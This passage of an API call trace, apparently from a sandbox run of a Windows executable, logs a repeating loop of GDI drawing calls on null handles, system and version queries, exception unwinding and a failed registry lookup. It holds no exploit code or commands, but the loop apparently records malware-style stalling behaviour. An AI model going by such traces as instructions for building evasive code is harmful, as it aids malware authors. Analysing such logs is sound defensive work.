wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.902] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.902] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.902] BeginPath (hdc=0x0) returned 0 [0087.902] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.902] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.903] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.903] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.903] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401d6 [0087.903] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401d3 [0087.903] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9b [0087.903] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9c [0087.903] CombineRgn (hrgnDst=0x1040d9b, hrgnSrc1=0xc30401d6, hrgnSrc2=0xc50401d3, iMode=1) returned 1 [0087.903] CombineRgn (hrgnDst=0x1040d9c, hrgnSrc1=0xc30401d6, hrgnSrc2=0xc50401d3, iMode=4) returned 2 [0087.903] CreateSolidBrush (color=0xff) returned 0x2100d9a [0087.903] CreateSolidBrush (color=0xff0000) returned 0x1100d9d [0087.903] DeleteObject (ho=0x1100d9d) returned 1 [0087.903] DeleteObject (ho=0xc50401d3) returned 1 [0087.903] DeleteObject (ho=0xc30401d6) returned 1 [0087.903] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.903] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.903] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.903] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.903] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.903] BeginPath (hdc=0x0) returned 0 [0087.903] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.903] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.903] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.903] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.903] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.903] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401d3 [0087.903] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401d6 [0087.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9e [0087.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9f [0087.904] CombineRgn (hrgnDst=0x1040d9e, hrgnSrc1=0xc60401d3, hrgnSrc2=0xc40401d6, iMode=1) returned 1 [0087.904] CombineRgn (hrgnDst=0x1040d9f, hrgnSrc1=0xc60401d3, hrgnSrc2=0xc40401d6, iMode=4) returned 2 [0087.904] CreateSolidBrush (color=0xff) returned 0x2100d9d [0087.904] CreateSolidBrush (color=0xff0000) returned 0x1100da0 [0087.904] DeleteObject (ho=0x1100da0) returned 1 [0087.904] DeleteObject (ho=0xc40401d6) returned 1 [0087.904] DeleteObject (ho=0xc60401d3) returned 1 [0087.904] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.904] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.904] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.904] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.904] BeginPath (hdc=0x0) returned 0 [0087.904] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.904] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.904] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.904] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.904] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401d6 [0087.904] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401d3 [0087.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da1 [0087.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da2 [0087.904] CombineRgn (hrgnDst=0x1040da1, hrgnSrc1=0xc50401d6, hrgnSrc2=0xc70401d3, iMode=1) returned 1 [0087.904] CombineRgn (hrgnDst=0x1040da2, hrgnSrc1=0xc50401d6, hrgnSrc2=0xc70401d3, iMode=4) returned 2 [0087.904] CreateSolidBrush (color=0xff) returned 0x2100da0 [0087.904] CreateSolidBrush (color=0xff0000) returned 0x1100da3 [0087.904] DeleteObject (ho=0x1100da3) returned 1 [0087.904] DeleteObject (ho=0xc70401d3) returned 1 [0087.904] DeleteObject (ho=0xc50401d6) returned 1 [0087.904] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.904] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.905] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.905] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.905] BeginPath (hdc=0x0) returned 0 [0087.905] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.905] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.905] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.905] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.905] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.905] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401d3 [0087.905] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401d6 [0087.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da4 [0087.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da5 [0087.905] CombineRgn (hrgnDst=0x1040da4, hrgnSrc1=0xc80401d3, hrgnSrc2=0xc60401d6, iMode=1) returned 1 [0087.905] CombineRgn (hrgnDst=0x1040da5, hrgnSrc1=0xc80401d3, hrgnSrc2=0xc60401d6, iMode=4) returned 2 [0087.905] CreateSolidBrush (color=0xff) returned 0x2100da3 [0087.905] CreateSolidBrush (color=0xff0000) returned 0x1100da6 [0087.905] DeleteObject (ho=0x1100da6) returned 1 [0087.905] DeleteObject (ho=0xc60401d6) returned 1 [0087.905] DeleteObject (ho=0xc80401d3) returned 1 [0087.905] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.905] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.905] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.905] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.905] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.905] BeginPath (hdc=0x0) returned 0 [0087.905] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.905] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.905] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.905] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.905] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.906] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc70401d6 [0087.906] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc90401d3 [0087.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da7 [0087.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da8 [0087.906] CombineRgn (hrgnDst=0x1040da7, hrgnSrc1=0xc70401d6, hrgnSrc2=0xc90401d3, iMode=1) returned 1 [0087.906] CombineRgn (hrgnDst=0x1040da8, hrgnSrc1=0xc70401d6, hrgnSrc2=0xc90401d3, iMode=4) returned 2 [0087.906] CreateSolidBrush (color=0xff) returned 0x2100da6 [0087.906] CreateSolidBrush (color=0xff0000) returned 0x1100da9 [0087.906] DeleteObject (ho=0x1100da9) returned 1 [0087.906] DeleteObject (ho=0xc90401d3) returned 1 [0087.906] DeleteObject (ho=0xc70401d6) returned 1 [0087.906] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.906] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.906] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.906] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.906] BeginPath (hdc=0x0) returned 0 [0087.906] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.906] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.906] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.906] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.906] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.906] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.906] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.906] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca0401d3 [0087.906] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc80401d6 [0087.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040daa [0087.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dab [0087.906] CombineRgn (hrgnDst=0x1040daa, hrgnSrc1=0xca0401d3, hrgnSrc2=0xc80401d6, iMode=1) returned 1 [0087.906] CombineRgn (hrgnDst=0x1040dab, hrgnSrc1=0xca0401d3, hrgnSrc2=0xc80401d6, iMode=4) returned 2 [0087.906] CreateSolidBrush (color=0xff) returned 0x2100da9 [0087.906] CreateSolidBrush (color=0xff0000) returned 0x1100dac [0087.906] DeleteObject (ho=0x1100dac) returned 1 [0087.906] DeleteObject (ho=0xc80401d6) returned 1 [0087.906] DeleteObject (ho=0xca0401d3) returned 1 [0087.907] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.907] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.907] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.907] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.907] BeginPath (hdc=0x0) returned 0 [0087.907] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.907] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.907] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.907] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.907] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc90401d6 [0087.907] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb0401d3 [0087.907] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dad [0087.907] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dae [0087.907] CombineRgn (hrgnDst=0x1040dad, hrgnSrc1=0xc90401d6, hrgnSrc2=0xcb0401d3, iMode=1) returned 1 [0087.907] CombineRgn (hrgnDst=0x1040dae, hrgnSrc1=0xc90401d6, hrgnSrc2=0xcb0401d3, iMode=4) returned 2 [0087.907] CreateSolidBrush (color=0xff) returned 0x2100dac [0087.907] CreateSolidBrush (color=0xff0000) returned 0x1100daf [0087.907] DeleteObject (ho=0x1100daf) returned 1 [0087.907] DeleteObject (ho=0xcb0401d3) returned 1 [0087.907] DeleteObject (ho=0xc90401d6) returned 1 [0087.907] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.907] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.907] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.907] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.907] BeginPath (hdc=0x0) returned 0 [0087.907] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.907] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.907] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.908] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.908] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc0401d3 [0087.908] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca0401d6 [0087.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db0 [0087.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db1 [0087.908] CombineRgn (hrgnDst=0x1040db0, hrgnSrc1=0xcc0401d3, hrgnSrc2=0xca0401d6, iMode=1) returned 1 [0087.908] CombineRgn (hrgnDst=0x1040db1, hrgnSrc1=0xcc0401d3, hrgnSrc2=0xca0401d6, iMode=4) returned 2 [0087.908] CreateSolidBrush (color=0xff) returned 0x2100daf [0087.908] CreateSolidBrush (color=0xff0000) returned 0x1100db2 [0087.908] DeleteObject (ho=0x1100db2) returned 1 [0087.908] DeleteObject (ho=0xca0401d6) returned 1 [0087.908] DeleteObject (ho=0xcc0401d3) returned 1 [0087.908] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.908] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.908] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.908] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.908] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.908] BeginPath (hdc=0x0) returned 0 [0087.908] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.908] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.908] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.908] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.908] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.908] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.908] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.908] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb0401d6 [0087.908] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd0401d3 [0087.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db3 [0087.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db4 [0087.908] CombineRgn (hrgnDst=0x1040db3, hrgnSrc1=0xcb0401d6, hrgnSrc2=0xcd0401d3, iMode=1) returned 1 [0087.908] CombineRgn (hrgnDst=0x1040db4, hrgnSrc1=0xcb0401d6, hrgnSrc2=0xcd0401d3, iMode=4) returned 2 [0087.909] CreateSolidBrush (color=0xff) returned 0x2100db2 [0087.909] CreateSolidBrush (color=0xff0000) returned 0x1100db5 [0087.909] DeleteObject (ho=0x1100db5) returned 1 [0087.909] DeleteObject (ho=0xcd0401d3) returned 1 [0087.909] DeleteObject (ho=0xcb0401d6) returned 1 [0087.909] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.909] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.909] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.909] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.909] BeginPath (hdc=0x0) returned 0 [0087.909] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.909] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.909] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: 